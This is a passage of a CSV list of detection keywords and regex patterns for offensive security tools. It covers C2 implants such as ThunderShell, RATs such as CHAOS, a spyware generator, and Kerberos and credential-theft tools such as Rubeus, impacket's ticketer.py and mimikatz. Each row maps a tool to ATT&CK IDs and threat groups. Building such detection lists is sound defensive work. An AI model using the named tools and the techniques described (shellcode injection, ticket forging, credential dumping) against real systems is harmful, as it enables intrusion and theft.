TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*ThrowbackDLL.vcxproj*",".{0,1000}ThrowbackDLL\.vcxproj.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*ThunderDNS*.php*",".{0,1000}ThunderDNS.{0,1000}\.php.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS*.ps1*",".{0,1000}ThunderDNS.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS*.py*",".{0,1000}ThunderDNS.{0,1000}\.py.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS.git*",".{0,1000}ThunderDNS\.git.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderFox.exe*",".{0,1000}ThunderFox\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ThunderShell*",".{0,1000}ThunderShell.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell.git*",".{0,1000}ThunderShell\.git.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell.py*",".{0,1000}ThunderShell\.py.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell-master.zip*",".{0,1000}ThunderShell\-master\.zip.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*thycotic_secretserver_dump.*",".{0,1000}thycotic_secretserver_dump\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*tiagorlampert*",".{0,1000}tiagorlampert.{0,1000}","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/tiagorlampert","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tiagorlampert/CHAOS*",".{0,1000}tiagorlampert\/CHAOS.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*tiagorlampert/chaos:latest*",".{0,1000}tiagorlampert\/chaos\:latest.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" 
"*tiagorlampert/sAINT*",".{0,1000}tiagorlampert\/sAINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*tiagorlampert@gmail.com*",".{0,1000}tiagorlampert\@gmail\.com.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*Tib3rius/AutoRecon*",".{0,1000}Tib3rius\/AutoRecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*ticket.kirbi*",".{0,1000}ticket\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. 
we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ticket.kirbi*",".{0,1000}ticket\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*ticketConverter.py *.ccache *",".{0,1000}ticketConverter\.py\s.{0,1000}\.ccache\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*ticketConverter.py*",".{0,1000}ticketConverter\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ticketer.py -nthash *",".{0,1000}ticketer\.py\s\-nthash\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*ticketer.py -nthash *",".{0,1000}ticketer\.py\s\-nthash\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a 
command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*ticketer.py -nthash*",".{0,1000}ticketer\.py\s\-nthash.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ticketer.py*",".{0,1000}ticketer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*ticketsplease adfs *",".{0,1000}ticketsplease\sadfs\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease azure *",".{0,1000}ticketsplease\sazure\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease dcsync *",".{0,1000}ticketsplease\sdcsync\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease ldap *",".{0,1000}ticketsplease\sldap\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease saml *",".{0,1000}ticketsplease\ssaml\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease ticket --domain*",".{0,1000}ticketsplease\sticket\s\-\-domain.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*ticketsplease.modules.*",".{0,1000}ticketsplease\.modules\..{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" 
"*TicketToHashcat.py*",".{0,1000}TicketToHashcat\.py.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*TicketToHashcat.py*",".{0,1000}TicketToHashcat\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Tiger-192.test-vectors.txt*",".{0,1000}Tiger\-192\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*tijme/kernel-mii*",".{0,1000}tijme\/kernel\-mii.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","80","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*TikiLoader*Hollower*",".{0,1000}TikiLoader.{0,1000}Hollower.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader.*",".{0,1000}TikiLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader.*",".{0,1000}TikiLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*TikiLoader.dll*",".{0,1000}TikiLoader\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader.dll*",".{0,1000}TikiLoader\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*TikiLoader.Injector*",".{0,1000}TikiLoader\.Injector.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiLoader\TikiLoader*",".{0,1000}TikiLoader\\TikiLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent 